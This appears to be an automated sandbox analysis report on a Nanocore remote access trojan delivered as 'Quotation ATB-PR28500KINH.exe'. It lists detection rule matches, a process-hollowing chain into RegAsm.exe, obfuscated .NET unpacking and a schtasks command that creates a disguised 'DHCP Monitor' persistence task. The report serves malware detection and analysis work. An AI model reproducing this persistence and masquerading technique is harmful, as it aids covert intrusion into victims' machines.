Source: 00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 7160, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 7160, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 3392, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 3392, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.RegAsm.exe.6670000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.6670000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegAsm.exe.5aa0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.5aa0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.RegAsm.exe.6670000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.6670000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: Quotation ATB-PR28500KINH.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 7redfg.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: HJdyTuap.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 15.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: classification engine

Classification label: mal100.troj.adwa.evad.winEXE@12/8@23/1

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File created: C:\Users\user\AppData\Roaming\7redfg

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{a69adb5e-9e05-4144-8e58-f506b6f9f16f}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Mutant created: \Sessions\1\BaseNamedObjects\Startup_shellcode_006

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp

Jump to behavior

Source: Quotation ATB-PR28500KINH.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quotation ATB-PR28500KINH.exe

ReversingLabs: Detection: 27%

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File read: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown	Process created: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 0
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Quotation ATB-PR28500KINH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Quotation ATB-PR28500KINH.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 15.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 15.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: HJdyTuap.exe.0.dr

Static PE information: real checksum: 0x1015a2 should be: 0x1023a2

Source: initial sample	Static PE information: section name: .text entropy: 7.86314578381
Source: initial sample	Static PE information: section name: .text entropy: 7.86314578381
Source: initial sample	Static PE information: section name: .text entropy: 7.86314578381

Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
